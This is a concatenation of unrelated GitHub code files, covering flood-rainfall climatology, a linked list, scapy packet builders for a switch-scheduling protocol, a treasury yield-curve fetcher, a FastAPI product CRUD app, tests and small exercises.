percentiles.\n# RegionName_list (list of strings): names for the domain's regions.\n# Git_repo (string): repository's local path.\n# FileIN_FR (string): relative path of the file containing the cleaned point point flood reports.\n# DirIN_FC (string): relative path of the directory containing the ecPoint rainfall forecasts.\n# DirOUT (string): relative path of the directory containing the rainfall climatology.\n\n# INPUT PARAMETERS\nYear = 2019\nAcc = 12\nEFFCI_list = [1,6,10]\nMagnitudeInPerc_Rain_Event_FR_list = [50, 75, 85, 90, 95, 98, 99]\nClimate_Percs = range(0,100)\nFormat_Climate_Percs = \"%d\"\nRegionName_list = [\"La Costa\",\"La Sierra\"]\nGit_repo=\"/ec/vol/ecpoint/mofp/PhD/Papers2Write/FlashFloods_Ecuador\"\nFileIN_FR = \"Data/Compute/01_Clean_PointFR/Ecu_FF_Hist_ECMWF.csv\"\nDirIN_FC = \"Data/Raw/FC/ecPoint\"\nDirOUT = \"Data/Compute/05_Climate_Rain_FR\"\n########################################################################################\n\n# Reading the cleaned point point flood reports for the considered year\nPointFR = pd.read_csv(Git_repo + \"/\" + FileIN_FR)\n\n# Creating the headers for the final .csv output files as a string (comma separated),\n# and the string that will define the values format for each column\nHeaders = \"Climate_Percentiles\"\nFormat = Format_Climate_Percs\nfor MagnitudeInPerc_Rain_Event_FR in MagnitudeInPerc_Rain_Event_FR_list:\n Headers = Headers + \",RainEvent_Magnitude_\" + str(MagnitudeInPerc_Rain_Event_FR) + \"th_Percentile\"\n Format = Format + \",%.2f\"\n\n# Computing the climatology of rainfall events associated with flash floods for a specific EFFCI index \nfor EFFCI in EFFCI_list:\n\n # Computing the climatology of rainfall events associated with flash floods for a specific region\n for RegionName in RegionName_list:\n\n print(\" \")\n print(\"Computing the rainfall climatologies for EFFCI: \" + str(EFFCI) + \", Region: \" + RegionName)\n\n # Extracting the point point flood reports for a specific year, EFFCI index and region\n PointFR_temp = PointFR.loc[(PointFR[\"year\"] == Year) & (PointFR[\"EFFCI\"] >= EFFCI) & (PointFR[\"Georegion\"] == RegionName)]\n\n # Extracting some parameters from the point point flood reports database\n lat_list = list(PointFR_temp[\"Y_DD\"])\n lon_list = list(PointFR_temp[\"X_DD\"])\n date_time_list = list(PointFR_temp[\"ReportDateTimeUTC\"])\n\n # Initializing the variable that will contain the rainfall events associated with the point point flood reports\n rain_event_FR = np.array(MagnitudeInPerc_Rain_Event_FR_list)\n\n # Computing the rainfall climatology\n for ind_PointFR in range(len(PointFR_temp)):\n \n print(\" - Considering point flood report n.\" + str(ind_PointFR+1) + \" of \" + str(len(PointFR_temp)))\n\n # Extracting the lat/lon coordinates and the date/time of single point point flood reports\n lat_temp = lat_list[ind_PointFR]\n lon_temp = lon_list[ind_PointFR]\n date_time_temp = datetime.strptime(date_time_list[ind_PointFR], \"%Y-%m-%d %H:%M:%S\")\n\n # Selecting the forecasts to read based on the report's time\n DateSTR_x = datetime.strftime(date_time_temp.date(), \"%Y%m%d\")\n DateSTR_1x = datetime.strftime(date_time_temp.date() - timedelta(days=1), \"%Y%m%d\")\n if date_time_temp.time() >= time(0,0) and date_time_temp.time() < time(6,0):\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_00_030.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_018.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_012.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_024.grib\"]\n elif date_time_temp.time() >= time(6,0) and date_time_temp.time() < time(12,0):\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_012.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_024.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_018.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_030.grib\"]\n elif date_time_temp.time() >= time(12,0) and date_time_temp.time() < time(18,0):\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_018.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_1x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_1x + \"_12_030.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_024.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_12_012.grib\"]\n else:\n FileIN_FC_list = [Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_024.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_12_012.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"00/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_00_030.grib\",\n Git_repo + \"/\" + DirIN_FC + \"/\" + DateSTR_x + \"12/Pt_BC_PERC_\" + f\"{Acc:03d}\" + \"_\" + DateSTR_x + \"_12_018.grib\"]\n\n # Reading the forecasts and extracting the rainfall totals for the nearest gridpoint to the flood report\n fc_FR = []\n for ind_FC in range(len(FileIN_FC_list)):\n FileIN_FC = FileIN_FC_list[ind_FC]\n if os.path.isfile(FileIN_FC):\n fc = mv.read(FileIN_FC)\n fc_FR.extend(mv.nearest_gridpoint(fc, lat_temp, lon_temp))\n\n # Computing different magnitudes of rainfall events associated with the point flood reports\n rain_event_FR = np.vstack([rain_event_FR, np.percentile(np.array(fc_FR), MagnitudeInPerc_Rain_Event_FR_list)])\n\n # Computing the rainfall climatology for the different events' magnitudes\n climate_rain_FR = np.percentile(rain_event_FR[1:], Climate_Percs, axis=0) # eliminate the first row of values which come from the initialization of the variable\n\n # Adding a column at the beginning of the matrix to indicate the percentiles each column corresponds to\n climate_rain_FR = np.column_stack((np.array(Climate_Percs),climate_rain_FR))\n \n # Savin in a .csv file the climatology of rainfall events associated with flash floods\n DirOUT_temp= Git_repo + \"/\" + DirOUT + \"/\" + f\"{Acc:02d}\" + \"h/EFFCI\" + f\"{EFFCI:02d}\"\n FileNameOUT = \"Climate_Rain_FR_\" + f\"{Acc:02d}\" + \"h_EFFCI\" + f\"{EFFCI:02d}\" + \"_\" + RegionName.split()[1] + \".csv\"\n if not os.path.exists(DirOUT_temp):\n os.makedirs(DirOUT_temp)\n np.savetxt(DirOUT_temp + \"/\" + FileNameOUT, climate_rain_FR, delimiter=\",\", fmt=Format, header=Headers, comments='') ","repo_name":"Fatima-Papers/Verif_Flash_Floods_Ecuador","sub_path":"Scripts/Processed/05_Compute_Climate_Rain_FR.py","file_name":"05_Compute_Climate_Rain_FR.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12681556344","text":"class TheNode:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self, value):\n new_node = TheNode(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n\n def append(self, theValue):\n new_node = TheNode(theValue)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n\n self.length += 1\n\n def popMeOut(self):\n if self.length == 0:\n return None\n\n pre = self.head\n temp = self.head\n\n while temp.next:\n pre = temp\n temp = temp.next\n\n self.tail = pre\n self.tail.next = None\n self.length -= 1\n\n if self.length == 0:\n self.head = None\n self.next = None\n\n return temp\n\n def popfirst(self):\n if self.length == 0:\n return None\n\n temp = self.head\n self.head = self.head.next\n temp.next = None\n self.length -= 1\n\n if self.length == 0:\n self.tail = None\n return temp\n\n def remove_me(self, index):\n if index < 0 or index >= self.length:\n return None\n if index == 0:\n return self.popfirst()\n if index == self.length - 1:\n return self.popMeOut()\n pre = self.get(index - 1)\n temp = pre.next\n pre.next = temp.next\n temp.next = None\n self.length -= 1\n return temp\n","repo_name":"Lemmynjash/datastructures_python_refresher","sub_path":"linked_list_v2/practical_remove.py","file_name":"practical_remove.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37326254961","text":"from random import randint\nimport scapy.all as scapy\n\nMDC_DEFAULT_PKT_SIZE = 64\n\nfield_dict = {'pkt_type': 1,\n 'cluster_id': 2,\n 'src_id': 2,\n 'dst_id': 2,\n 'q_len': 1,\n 'seq_num': 2}\n\nfield_cls_dict = {1: scapy.XByteField,\n 2: scapy.XShortField,\n 3: scapy.X3BytesField,\n 4: scapy.XIntField,\n 8: scapy.XLongField}\n\nSAQR_PORT = 1234\nETHER_IPV4_TYPE = 0x0800\n\nPKT_TYPE_NEW_TASK = 0x00\nPKT_TYPE_NEW_TASK_RANDOM = 0x01\nPKT_TYPE_TASK_DONE = 0x02\nPKT_TYPE_TASK_DONE_IDLE = 0x03\nPKT_TYPE_QUEUE_REMOVE = 0x04\nPKT_TYPE_SCAN_QUEUE_SIGNAL = 0x05\nPKT_TYPE_IDLE_SIGNAL = 0x06\nPKT_TYPE_QUEUE_SIGNAL = 0x07\nPKT_TYPE_PROBE_IDLE_QUEUE = 0x08\nPKT_TYPE_PROBE_IDLE_RESPONSE = 0x09\nPKT_TYPE_IDLE_REMOVE = 0x0a\nPKT_TYPE_QUEUE_SIGNAL_INIT = 0x0b\n\ndef get_field(name):\n exists = type(name) == str and name.lower() in field_dict\n if exists:\n field_size = field_dict[name.lower()]\n if field_size in field_cls_dict:\n cls = field_cls_dict[field_size]\n return cls(name.lower(), 0)\n raise ValueError('field_size is incorrect')\n raise ValueError('field is not supported')\n\nclass SaqrPacket(scapy.Packet):\n name = 'saqrPacket'\n fields_desc = [\n get_field('pkt_type'),\n get_field('cluster_id'),\n get_field('src_id'),\n get_field('dst_id'),\n get_field('q_len'),\n get_field('seq_num')\n ]\n\ndef get_random_ip_addresses():\n ip_list = [('100.168.1.1', '100.132.44.1'),\n ('72.67.48.53', '72.10.30.55'),\n ]\n rand_idx = randint(0, len(ip_list)-1)\n return ip_list[rand_idx]\n\ndef generate_load(length):\n load = ''\n for i in range(length):\n load += chr(randint(0, 255))\n return load\n\ndef make_eth_hdr(src_mac=None, dst_mac=None, ip_encap=False, **kwargs):\n hdr = scapy.Ether()\n hdr.type = ETHER_IPV4_TYPE\n if src_mac:\n hdr.src = src_mac\n if dst_mac:\n hdr.dst = dst_mac\n return hdr\n\ndef make_saqr_task_pkt(dst_ip, cluster_id, src_id, dst_id, q_len=0, seq_num=1000, pkt_len=128, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_NEW_TASK, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n\n data_len = pkt_len - len(eth_hdr) - len(saqr_hdr)\n if data_len < 0:\n data_len = 0\n payload = generate_load(data_len)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(sport=SAQR_PORT, dport=SAQR_PORT, chksum=0) / saqr_hdr / payload\n return pkt\n\ndef make_saqr_probe_idle_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, q_len=0, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n \n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_PROBE_IDLE_QUEUE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n \n return pkt\n\ndef make_saqr_probe_idle_response_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, q_len, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n \n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_PROBE_IDLE_RESPONSE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n \n return pkt\n\ndef make_saqr_scan_queue_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_SCAN_QUEUE_SIGNAL, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_queue_remove_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_QUEUE_REMOVE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_idle_signal_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_IDLE_SIGNAL, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_idle_remove_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_IDLE_REMOVE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_queue_signal_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, is_init, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n if is_init:\n pkt_type = PKT_TYPE_QUEUE_SIGNAL_INIT\n else:\n pkt_type = PKT_TYPE_QUEUE_SIGNAL\n saqr_hdr = SaqrPacket(pkt_type=pkt_type, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\n\ndef make_saqr_task_done_pkt(dst_ip, cluster_id, src_id, dst_id, is_idle, q_len, seq_num=1000, pkt_len=128, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n if is_idle:\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_TASK_DONE_IDLE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n else:\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_TASK_DONE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\n\n\n\n","repo_name":"horus-scheduler/horus-p4","sub_path":"p4_16/targets/tofino/legacy/saqr/pkts.py","file_name":"pkts.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21861735556","text":"import datetime\n\nimport pandas as pd\nfrom src.backend.data.api_base import DataAPIBase\n\n\nclass DailyTreasuryYieldCurve(DataAPIBase):\n\n def __init__(self):\n super().__init__()\n self._from_cache = True\n\n def get_all_data_between_dates(self, start_date, end_date):\n return self._request_data(start_date, end_date)\n\n def get_col_data_between_dates(self, start_date, end_date, search_column, search_str):\n data = self.get_all_data_between_dates(start_date=start_date, end_date=end_date)\n assert search_str in data[search_column].unique()\n return data[data[search_column] == search_str].reset_index(drop=True)\n\n def get_yield_curve_for_date(self, date):\n # We create a range of days incase the day selected is not a trading day\n start_date = self.create_date(year=date.year, month=date.month, day=date.day)\n end_date = min([start_date + datetime.timedelta(days=30),\n datetime.datetime.today()])\n\n df = self.get_all_data_between_dates(start_date=start_date, end_date=end_date)\n\n # Isolate day, we know that the date closest to the requested date is first one\n df = df.drop(columns=[self.date_col_name])\n if len(df) == 0:\n return None\n\n df = df.iloc[0]\n df = df.transpose()\n df = pd.DataFrame(df)\n df.columns = ['Yield (%)']\n\n # Add column for maturity in days\n for i, row in df.iterrows():\n num = int(str(i).split(' ')[0])\n\n if 'Mo' in i:\n days = num * 30\n elif 'Yr' in i:\n days = num * 365\n else:\n raise ValueError(f'Unknown date format: {i}')\n df.loc[i, 'Days'] = days\n\n df = df[['Days', 'Yield (%)']]\n df = df.reset_index(drop=False)\n df = df.rename(columns={'index': 'Maturity'})\n return df\n\n def _request_data(self, start_date, end_date):\n min_year = start_date.year\n max_year = end_date.year\n\n _all_df = list()\n for year in range(min_year, max_year + 1):\n _df = self._request_data_for_year(year)\n _all_df.append(_df)\n _all_df = pd.concat(_all_df, axis=0).reset_index(drop=True)\n _all_df = _all_df.sort_values(by=self.date_col_name, ascending=True)\n _all_df = _all_df.loc[(_all_df[self.date_col_name] >= start_date) & (_all_df[self.date_col_name] <= end_date)]\n _all_df = _all_df.reset_index(drop=True)\n return _all_df\n\n def _request_data_for_year(self, year):\n\n unique_str = f'DailyTreasuryYieldCurve{year}'\n\n df = None\n if self._from_cache:\n df = self._load_data_from_cache(unique_str)\n\n if df is None:\n print(f'Requesting data from treasury.gov for {year}')\n df = pd.read_csv('https://home.treasury.gov/resource-center/data-chart-center/interest-rates/'\n 'daily-treasury-rates.csv/'\n f'{year}/all?type=daily_treasury_yield_curve&field_tdr_date_value={year}&page&_format=csv')\n self._save_to_cache(unique_str=unique_str, data=df)\n\n df = self.format_data(df)\n\n return df\n\n def format_data(self, df):\n df = df.rename(columns={'Date': self.date_col_name})\n df[self.date_col_name] = pd.to_datetime(df[self.date_col_name], format='%m/%d/%Y')\n return df\n\n\nif __name__ == '__main__':\n dtyc = DailyTreasuryYieldCurve()\n\n all_data = dtyc.get_all_data_between_dates(start_date=dtyc.create_date(year=2020, month=1, day=1),\n end_date=dtyc.create_date(year=2022, month=1, day=1))\n\n import matplotlib.pyplot as plt\n #\n # # # Plot Historical Yield Data\n # plt.plot(all_data['date'], all_data['1 Yr'])\n # plt.plot(all_data['date'], all_data['2 Yr'])\n # plt.plot(all_data['date'], all_data['5 Yr'])\n # plt.plot(all_data['date'], all_data['10 Yr'])\n # plt.plot(all_data['date'], all_data['30 Yr'])\n # plt.show()\n\n # Plot the Yield Curve for 26/09/2022\n yc_data = dtyc.get_yield_curve_for_date(date=datetime.datetime(year=2022, month=9, day=27))\n print(yc_data)\n plt.plot(yc_data['Days'], yc_data['Yield (%)'])\n plt.show()\n","repo_name":"JordanYeomans/macro_economics","sub_path":"src/backend/data/home_treasury_gov/daily_treasury_yield_curve.py","file_name":"daily_treasury_yield_curve.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"262996567","text":"# Define the function with input parameters garbage and travel lists and output an integer\nclass Solution:\n def garbageCollection(self, garbage: List[str], travel: List[int]) -> int:\n \n # Reverse the order of elements in the garbage and travel lists\n garbage.reverse()\n travel.reverse()\n \n # Join the elements in garbage list to a single string\n garbage2=\"\".join(garbage)\n \n # Initialize variables to store the distances to each of the G, P and M locations\n a=0\n b=0\n c=0\n \n # Loop through the garbage list and find the distances to the first occurrence of G, P and M\n for i in range(len(garbage)):\n # If distances to all G, P and M are found, break out of the loop\n if(a!=0 and b!=0 and c!=0):\n break\n # Find the distance to G if it has not been found yet\n if (\"G\" in garbage[i]) and a==0:\n a=sum(travel[i:])\n # Find the distance to P if it has not been found yet\n if (\"P\" in garbage[i]) and b==0:\n b=sum(travel[i:])\n # Find the distance to M if it has not been found yet\n if (\"M\" in garbage[i]) and c==0:\n c=sum(travel[i:])\n \n # Calculate the total distance covered by the garbage truck\n sum1=len(garbage2)+a+b+c\n \n # Return the total distance\n return sum1\n\n\n \n\n\n\n ","repo_name":"DominatingShot/COMPETITIVE-CODING","sub_path":"LEET-CODE/2391.Minimum_Amount_of_Time_to_Collect_Garbage/Minimum_Amount_of_Time_to_Collect_Garbage.py","file_name":"Minimum_Amount_of_Time_to_Collect_Garbage.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6053619610","text":"import datetime\n\nimport pytest\nimport s3fs\n\nimport podpac\nfrom podpac.datalib import gfs\n\n\n@pytest.mark.skip(\"Broken, GFS data source structure changed. \")\n@pytest.mark.integration\nclass TestGFS(object):\n parameter = \"SOIM\"\n level = \"0-10 m DPTH\"\n\n @classmethod\n def setup_class(cls):\n # find an existing date\n s3 = s3fs.S3FileSystem(anon=True)\n prefix = \"%s/%s/%s/\" % (gfs.BUCKET, cls.parameter, cls.level)\n dates = [path.replace(prefix, \"\") for path in s3.ls(prefix)]\n cls.date = dates[0]\n\n def test_source(self):\n # specify source datetime and forecast\n gfs_soim = gfs.GFSSourceRaw(\n parameter=self.parameter,\n level=self.level,\n date=self.date,\n hour=\"1200\",\n forecast=\"003\",\n anon=True,\n )\n\n o = gfs_soim.eval(gfs_soim.coordinates)\n\n def test_composited(self):\n # specify source datetime, select forecast at evaluation from time coordinates\n gfs_soim = gfs.GFS(parameter=self.parameter, level=self.level, date=self.date, hour=\"1200\", anon=True)\n\n # whole world forecast at 15:30\n forecast_time = datetime.datetime.strptime(self.date + \" 15:30\", \"%Y%m%d %H:%M\")\n coords = gfs_soim.sources[0].coordinates\n c = podpac.Coordinates([coords[\"lat\"], coords[\"lon\"], forecast_time], dims=[\"lat\", \"lon\", \"time\"])\n o = gfs_soim.eval(c)\n\n # time series: get the forecast at lat=42, lon=275 every hour for 6 hours\n start = forecast_time\n stop = forecast_time + datetime.timedelta(hours=6)\n c = podpac.Coordinates([42, 282, podpac.crange(start, stop, \"1,h\")], dims=[\"lat\", \"lon\", \"time\"])\n o = gfs_soim.eval(c)\n\n def test_latest(self):\n # get latest source, select forecast at evaluation\n gfs_soim = gfs.GFSLatest(parameter=self.parameter, level=self.level, anon=True)\n\n # latest whole world forecast\n forecast_time = datetime.datetime.strptime(gfs_soim.date + \" \" + gfs_soim.hour, \"%Y%m%d %H%M\")\n coords = gfs_soim.sources[0].coordinates\n c = podpac.Coordinates([coords[\"lat\"], coords[\"lon\"], forecast_time], dims=[\"lat\", \"lon\", \"time\"])\n o = gfs_soim.eval(c)\n","repo_name":"creare-com/podpac","sub_path":"podpac/datalib/test/test_gfs.py","file_name":"test_gfs.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"3"} +{"seq_id":"9381093195","text":"from fastapi import FastAPI, HTTPException, Request, Form\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\nimport psycopg2\nimport uvicorn \n\n\nclass Produto(BaseModel):\n codigo: int | None\n nome: str\n preco: float\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"static\")\n\n# Configurando CORS para permitir requisições de qualquer origem\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Conectar ao banco de dados PostgreSQL\nconn = psycopg2.connect(\n dbname=\"uirses\",\n user=\"uiers\",\n password=\"hudhsahuDSADas243\",\n host=\"postgres\",\n port=\"5432\"\n)\ncursor = conn.cursor()\n\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n@app.get(\"/\", response_class=HTMLResponse, tags=[\"root\"])\ndef root_endpoint(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n@app.post(\"/produtos/\")\nasync def criar_produto(produto: Produto):\n try:\n cursor.execute(\"INSERT INTO produtos (nome, preco) VALUES (%s, %s) RETURNING codigo;\", (produto.nome, produto.preco))\n produto.codigo = cursor.fetchone()[0]\n conn.commit()\n return produto\n except Exception as e:\n conn.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.get(\"/produtos/\")\nasync def listar_produtos():\n try:\n cursor.execute(\"SELECT codigo, nome, preco FROM produtos;\")\n produtos = cursor.fetchall()\n return produtos\n except Exception as e:\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.put(\"/produtos/{codigo}/\")\nasync def atualizar_produto(produto: Produto):\n try:\n cursor.execute(\"UPDATE produtos SET nome = %s, preco = %s WHERE codigo = %s;\", (produto.nome, produto.preco, produto.codigo))\n conn.commit()\n return {\"message\": f\"Produto de código {produto.codigo} atualizado com sucesso.\"}\n except Exception as e:\n conn.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.delete(\"/produtos/{codigo}/\")\nasync def excluir_produto(codigo: int):\n try:\n cursor.execute(\"DELETE FROM produtos WHERE codigo = %s;\", (codigo,))\n conn.commit()\n return {\"message\": f\"Produto de código {codigo} excluído com sucesso.\"}\n except Exception as e:\n conn.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n\n\nif __name__ == '__main__':\n uvicorn.run('main:app', host='0.0.0.0', port=80)","repo_name":"Galactros/web-app-programacao-web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70273527122","text":"inputString = input()\noutputString = ''\nlowerLatter = 0\nupperLatter = 0\n\nfor latter in inputString :\n if latter >= 'a' and latter <= 'z' :\n lowerLatter = lowerLatter + 1\n elif latter >= 'A' and latter <= 'Z' :\n upperLatter = upperLatter + 1\n\nif upperLatter > lowerLatter :\n outputString = inputString.upper()\nelse:\n outputString = inputString.lower()\n\nprint(outputString)\n","repo_name":"behroozameri/Maktabkhooneh-Python-Programming-for-Beginners","sub_path":"Season-3-Exercise-5.py","file_name":"Season-3-Exercise-5.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32094734889","text":"\"\"\"add post subreddit index\n\nRevision ID: 8b61fe3a51ce\nRevises: 581822d8495e\nCreate Date: 2023-02-25 21:25:27.142373\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8b61fe3a51ce'\ndown_revision = '581822d8495e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('posts', schema='posts') as batch_op:\n batch_op.create_index(batch_op.f('ix_posts_posts_reddit_subreddit_id'), ['reddit_subreddit_id'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('posts', schema='posts') as batch_op:\n batch_op.drop_index(batch_op.f('ix_posts_posts_reddit_subreddit_id'))\n\n # ### end Alembic commands ###\n","repo_name":"jacob-bayer/SunbeltAPI","sub_path":"migrations/versions/8b61fe3a51ce_add_post_subreddit_index.py","file_name":"8b61fe3a51ce_add_post_subreddit_index.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43985557251","text":"from __future__ import print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n\ndef gauss(x, H, A, x0, sigma):\n return H + A * np.exp(-(x - x0) ** 2 / (2 * sigma ** 2))\n\ndef gauss_fit(x, y):\n mean = sum(x * y) / sum(y)\n sigma = np.sqrt(sum(y * (x - mean) ** 2) / sum(y))\n popt, pcov = curve_fit(gauss, x, y, p0=[min(y), max(y), mean, 